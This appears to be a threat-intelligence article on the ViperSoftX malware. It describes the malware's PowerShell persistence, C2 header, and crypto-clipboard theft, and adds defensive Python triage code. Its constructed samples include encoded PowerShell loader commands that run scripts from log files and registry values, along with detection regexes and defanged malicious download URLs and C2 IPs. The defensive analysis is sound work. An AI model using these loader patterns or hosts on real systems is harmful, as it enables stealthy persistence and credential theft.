AhnLab Security Intelligence Center (ASEC) has identified persistent and sophisticated campaigns involving the ViperSoftX malware, originating from threat actors aggressively targeting users in South Korea and other regions.
The campaigns leverage ViperSoftX’s modular architecture to infiltrate systems, execute remote commands, and facilitate the theft of sensitive credentials, particularly those linked to cryptocurrency wallets.
ViperSoftX’s distribution methods, persistence mechanisms, and extensive use of PowerShell scripts present significant challenges for traditional defense systems.
ViperSoftX first emerged in 2020, frequently distributed under the guise of cracked software and key generators. Infections later expanded into distribution via malicious eBooks on torrent platforms, broadening its victim base.
The tactic of using illegal software as an initial infection vector remains core to the malware’s spread, impacting users globally regardless of nationality whenever they download unauthorized executables from untrusted sources.
Technical Attack Flow
Upon execution, ViperSoftX deploys multiple obfuscated PowerShell scripts to establish persistence and retrieve additional payloads.
The malware registers scheduled tasks using sophisticated methods, such as embedding malicious scripts in disguised log files or storing encoded downloader commands within Windows Registry entries.
According to the ASEC report, these techniques allow the malware to evade detection while keeping its persistence redundant: if one mechanism is removed, another re-establishes the foothold.
The PowerShell scripts serve as downloaders, either fetching malicious payloads directly from URLs or using advanced techniques like DNS TXT record queries to receive encrypted instructions and secondary payloads.
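The persistence described above leaves traces a defender can triage: a scheduled task whose action runs PowerShell with an encoded command, reads its script from a file with a `.log` extension, or pulls a loader out of a registry value. The script below is an added example, not ASEC's or the article's code, and does not reproduce any real ViperSoftX artifact. It parses Task Scheduler XML (the format `schtasks /query /xml` and the `Export-ScheduledTask` cmdlet emit), decodes any `-EncodedCommand` argument, and scores each action against the indicators the report describes. All task names, paths and registry keys in the samples are constructed, and the "PowerShell plus two or more indicators" scoring rule is an assumed threshold.

```python
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Indicators derived from the behaviour described in the report. Each pattern is
# run over the action's arguments plus any decoded -EncodedCommand payload.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "script_from_log_file": re.compile(r"\b(?:get-content|gc|cat)\b[^|;]*\.log\b", re.I),
    "script_from_registry": re.compile(r"\bget-itemproperty\b|\bHK(?:CU|LM):", re.I),
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the usual
# short forms are listed here.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(arguments: str):
    """Return the script behind a -EncodedCommand/-enc argument, or None.
    PowerShell expects base64 over UTF-16LE text."""
    m = ENCODED_ARG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_task_xml(xml_text: str):
    """Inspect every <Exec> action in one Task Scheduler XML document and
    return one finding dict per action."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="(no URI)", namespaces=TASK_NS)
    findings = []
    for action in root.findall("t:Actions/t:Exec", TASK_NS):
        command = action.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        arguments = action.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        decoded = decode_encoded_command(arguments)
        haystack = arguments if decoded is None else arguments + "\n" + decoded
        hits = [name for name, pattern in INDICATORS.items() if pattern.search(haystack)]
        if decoded is not None:
            hits.append("encoded_command")
        runs_powershell = any(p in command.lower() for p in ("powershell", "pwsh"))
        findings.append({
            "task": uri,
            "command": command,
            "decoded_command": decoded,
            "indicators": sorted(hits),
            # assumed scoring rule: PowerShell plus two or more indicators
            "suspicious": runs_powershell and len(hits) >= 2,
        })
    return findings


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def task_xml(uri: str, command: str, arguments: str) -> str:
    """Minimal Task Scheduler XML (constructed sample; real exports start with a
    UTF-16 declaration and should be parsed from bytes, not str)."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<RegistrationInfo><URI>{escape(uri)}</URI></RegistrationInfo>"
        '<Actions Context="Author"><Exec>'
        f"<Command>{escape(command)}</Command><Arguments>{escape(arguments)}</Arguments>"
        "</Exec></Actions></Task>"
    )


# Constructed samples: an ordinary updater task, a task whose encoded command runs
# a script hidden in a ".log" file, and a task that pulls its loader from a
# registry value. Every path, task name and key name here is made up.
LOG_LOADER = 'Invoke-Expression (Get-Content "$env:APPDATA\\Constructed\\sys.log" -Raw)'
SAMPLE_TASKS = [
    task_xml(r"\ConstructedVendor\Updater",
             r"C:\Program Files\ConstructedVendor\updater.exe", "--check-updates"),
    task_xml(r"\Microsoft\Windows\Constructed\Cleanup", "powershell.exe",
             "-NoP -W Hidden -ep bypass -enc " + encode_ps(LOG_LOADER)),
    task_xml(r"\Constructed\SystemHealth",
             r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
             r'-w hidden -c "iex (Get-ItemProperty HKCU:\Software\ConstructedKey).Loader"'),
]

if __name__ == "__main__":
    for xml_doc in SAMPLE_TASKS:
        for f in triage_task_xml(xml_doc):
            flag = "SUSPICIOUS" if f["suspicious"] else "ok"
            print(f"{flag:10} {f['task']}  indicators={f['indicators']}")
            if f["decoded_command"]:
                print(f"           decoded: {f['decoded_command']}")
```

On a live host, feed `triage_task_xml` the XML of each task under `C:\Windows\System32\Tasks` (read as bytes, since the files are UTF-16) rather than the constructed samples; the registry and Run-key variants the report mentions need a separate enumeration, but the same indicator patterns apply to whatever command line they launch.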

Data exfiltration and command-and-control (C2) communication are implemented through customized HTTP headers, with the “X-User-Agent” field transmitting detailed host information (such as system version, user credentials, GUID, AV status, and more).
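A custom header that carries host details is a network-side detection opportunity, because `X-User-Agent` is not a standard request header and legitimate clients rarely stuff a machine GUID or an OS build into one. The following is an added example, not code from ASEC or the article: it parses raw HTTP requests (as a proxy log or PCAP extraction would yield them) and scores the `X-User-Agent` value on the kinds of fields the report says it carries. The article does not reproduce the exact layout of the header value, so the pipe-delimited `key=value` format in the suspect sample, the host name (a reserved `.invalid` domain) and the GUID are all constructed.

```python
import re

# Shapes of the host-information fields the report says the header carries.
GUID_RE = re.compile(r"\{?[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}\}?")
WIN_VERSION_RE = re.compile(
    r"\b(?:windows|win)\s*(?:nt\s*)?\d+(?:\.\d+){0,3}\b|\b10\.0\.\d{4,5}\b", re.I)
HOST_INFO_HINTS = re.compile(r"\b(?:user|av|antivirus|guid|arch|os)\s*[=:]", re.I)


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (request line, {lowercased header: value}).
    The body, if any, is ignored."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_request(raw: str):
    """Score one request on its X-User-Agent header; 'suspicious' is set when at
    least three reasons fire (assumed threshold)."""
    request_line, headers = parse_request(raw)
    xua = headers.get("x-user-agent")
    finding = {
        "request": request_line,
        "host": headers.get("host", ""),
        "x_user_agent": xua,
        "reasons": [],
        "suspicious": False,
    }
    if xua is None:
        return finding
    finding["reasons"].append("nonstandard X-User-Agent header present")
    if GUID_RE.search(xua):
        finding["reasons"].append("GUID-shaped host identifier")
    if WIN_VERSION_RE.search(xua):
        finding["reasons"].append("OS version string")
    if HOST_INFO_HINTS.search(xua):
        finding["reasons"].append("key=value host fields")
    if len(xua) > 64:
        finding["reasons"].append("unusually long value")
    finding["suspicious"] = len(finding["reasons"]) >= 3
    return finding


# Constructed sample traffic. The ordinary browser request carries only the
# standard User-Agent; the suspect one adds an X-User-Agent profile of the host.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept: */*\r\n\r\n"
)
SUSPECT_REQUEST = (
    "GET /api/check HTTP/1.1\r\n"
    "Host: constructed-c2.invalid\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "X-User-Agent: os=Windows 10.0.19045|user=alice|"
    "guid={3f2504e0-4f89-11d3-9a0c-0305e82c3301}|av=ConstructedAV\r\n"
    "Accept: */*\r\n\r\n"
)

if __name__ == "__main__":
    for raw in (BENIGN_REQUEST, SUSPECT_REQUEST):
        f = inspect_request(raw)
        print(f"{'SUSPICIOUS' if f['suspicious'] else 'ok':10} {f['host']:26} {f['reasons']}")
```

The same logic translates directly into a proxy or IDS rule: alert on any outbound request with an `X-User-Agent` header whose value contains a GUID or OS build string, and keep the standard `User-Agent` out of the match so ordinary browser traffic does not fire it.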
A core capability of ViperSoftX lies in harvesting and exfiltrating sensitive data. The malware closely monitors Windows clipboard activity and window titles to detect cryptocurrency wallet software.
It surveils clipboard data for wallet addresses or BIP39 recovery phrases, immediately transmitting any matches to C2 servers.
These operations target a wide spectrum of crypto wallet formats including BTC, ETH, XRP, ADA, and several others using regex-based identification.
To eliminate interference from competing clipboard-manipulating malware (ClipBankers), ViperSoftX introduces a “ClipboardProtect.ps1” script, which inspects active processes.
Unsigned processes outside trusted directories are terminated when clipboard access occurs, preventing rival malware from hijacking transaction data.
The malware also collects exhaustive data on installed browser extensions and software, with explicit targeting of Chromium-based and Mozilla browsers such as Chrome, Edge, Opera, Firefox, and more. This telemetry is sent to threat actors for further exploitation or lateral targeting.
Multi-Stage Payload Delivery
ViperSoftX frequently acts as a conduit for additional malware. Notably, it downloads and launches open-source threats such as Quasar RAT, a remote access trojan with keylogging and credential theft capabilities.
Recent campaigns have also deployed PureCrypter, a .NET-based loader with analysis evasion and process injection features, and PureHVNC, a commercial remote desktop tool.

Furthermore, ViperSoftX can install additional clipboard hijackers (ClipBankers) to further automate the theft of crypto assets by swapping clipboard addresses with attacker-controlled wallets.
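Two behaviours described above, the regex-based recognition of wallet addresses and BIP39 phrases on the clipboard and the ClipBanker-style swapping of a copied address for an attacker-controlled one, can be turned around into a host-side detection: sample the clipboard, classify what is in it, and alert when one address is replaced by a different address of the same type faster than a person would copy two. The code below is an added example, not ASEC's or the malware's logic; the address patterns are public format conventions for the wallet types the article names (not the malware's own regexes, which the article does not reproduce), the BIP39 check is a shape heuristic rather than a wordlist lookup, and the one-second swap window and the clipboard timeline are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Public address-format conventions for the wallet types the article names.
# They only check shape, not checksum, and are not the malware's patterns.
WALLET_PATTERNS = {
    "BTC": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{25,87})$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "XRP": re.compile(r"^r[1-9A-HJ-NP-Za-km-z]{24,34}$"),
    "ADA": re.compile(r"^addr1[a-z0-9]{50,}$"),
}
# Heuristic for a BIP39 recovery phrase: 12/15/18/21/24 lowercase words of 3-8
# letters. A full check validates every word against the 2048-word list.
BIP39_SHAPE = re.compile(r"^[a-z]{3,8}(?: [a-z]{3,8}){11,23}$")
BIP39_WORD_COUNTS = {12, 15, 18, 21, 24}


def classify(text: str):
    """Return the wallet type a clipboard string looks like, 'BIP39' for a
    seed-phrase-shaped string, or None for anything else."""
    s = text.strip()
    for name, pattern in WALLET_PATTERNS.items():
        if pattern.match(s):
            return name
    if BIP39_SHAPE.match(s) and len(s.split()) in BIP39_WORD_COUNTS:
        return "BIP39"
    return None


@dataclass
class SwapAlert:
    at: float          # timestamp of the sample that shows the replacement
    wallet: str        # address type that was swapped
    original: str
    replacement: str


def detect_swaps(observations, max_gap_seconds: float = 1.0):
    """observations: list of (timestamp_seconds, clipboard_text), ordered in time.
    Flag consecutive samples where one address is replaced by a different
    address of the same type within max_gap_seconds. A user rarely copies two
    addresses that quickly; a hijacker rewriting the clipboard does (assumed
    threshold)."""
    alerts = []
    for (t0, before), (t1, after) in zip(observations, observations[1:]):
        kind = classify(before)
        if kind is None or kind == "BIP39":
            continue
        if (classify(after) == kind and before.strip() != after.strip()
                and (t1 - t0) <= max_gap_seconds):
            alerts.append(SwapAlert(t1, kind, before.strip(), after.strip()))
    return alerts


# Constructed clipboard timeline. The first BTC string is the well-known
# genesis-block address; the "attacker" address is a made-up base58 string,
# and the phrase is the first twelve entries of the public BIP39 wordlist.
SAMPLE_OBSERVATIONS = [
    (0.00, "meeting notes for Tuesday"),
    (5.20, "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),
    (5.35, "1ConstructedAttackerAddrXXXXXXXXXX"),
    (40.0, "0x0123456789abcdef0123456789abcdef01234567"),
    (95.0, "abandon ability able about above absent absorb abstract absurd abuse access accident"),
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_OBSERVATIONS):
        print(f"[{alert.at:6.2f}s] {alert.wallet} address swapped: "
              f"{alert.original} -> {alert.replacement}")
```

On a Windows host the observations would come from polling the clipboard (for instance `Get-Clipboard` in PowerShell on a short timer) and the alert would name the process that wrote the replacement; the classifier is also useful on its own for DLP-style monitoring, since a BIP39-shaped string on the clipboard is exactly what the report says the malware exfiltrates.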
Given ViperSoftX’s prevalence and potent data exfiltration risks, users are urged to avoid obtaining software from unofficial sources, apply all relevant OS and software security patches, and maintain up-to-date endpoint protection.
The multi-vector persistence and stealthy PowerShell-based communication of ViperSoftX reinforce the need for advanced endpoint monitoring and behavioral detection.
Indicators of Compromise (IOC)
Type | Value |
---|---|
MD5 hash | 064b1e45016e8a49eba01878e41ecc37 |
MD5 hash | 0ed2d0579b60d9e923b439d8e74b53e1 |
MD5 hash | 0efe1a5d5f4066b7e9755ad89ee9470c |
MD5 hash | 197ff9252dd5273e3e77ee07b37fd4dd |
MD5 hash | 1ec4b69f3194bd647639e6b0fa5c7bb5 |
URL | http[:]//136[.]243[.]132[.]112/ut[.]exe |
URL | http[:]//136[.]243[.]132[.]112[:]881/3[.]exe |
URL | http[:]//136[.]243[.]132[.]112[:]881/APPDATA[.]exe |
URL | http[:]//136[.]243[.]132[.]112[:]881/a[.]ps1 |
URL | http[:]//136[.]243[.]132[.]112[:]881/firefoxtemp[.]exe |
IP address | 136[.]243[.]132[.]112 |
IP address | 160[.]191[.]77[.]89 |
IP address | 185[.]245[.]183[.]74 |
IP address | 212[.]56[.]35[.]232 |
IP address | 89[.]117[.]79[.]31 |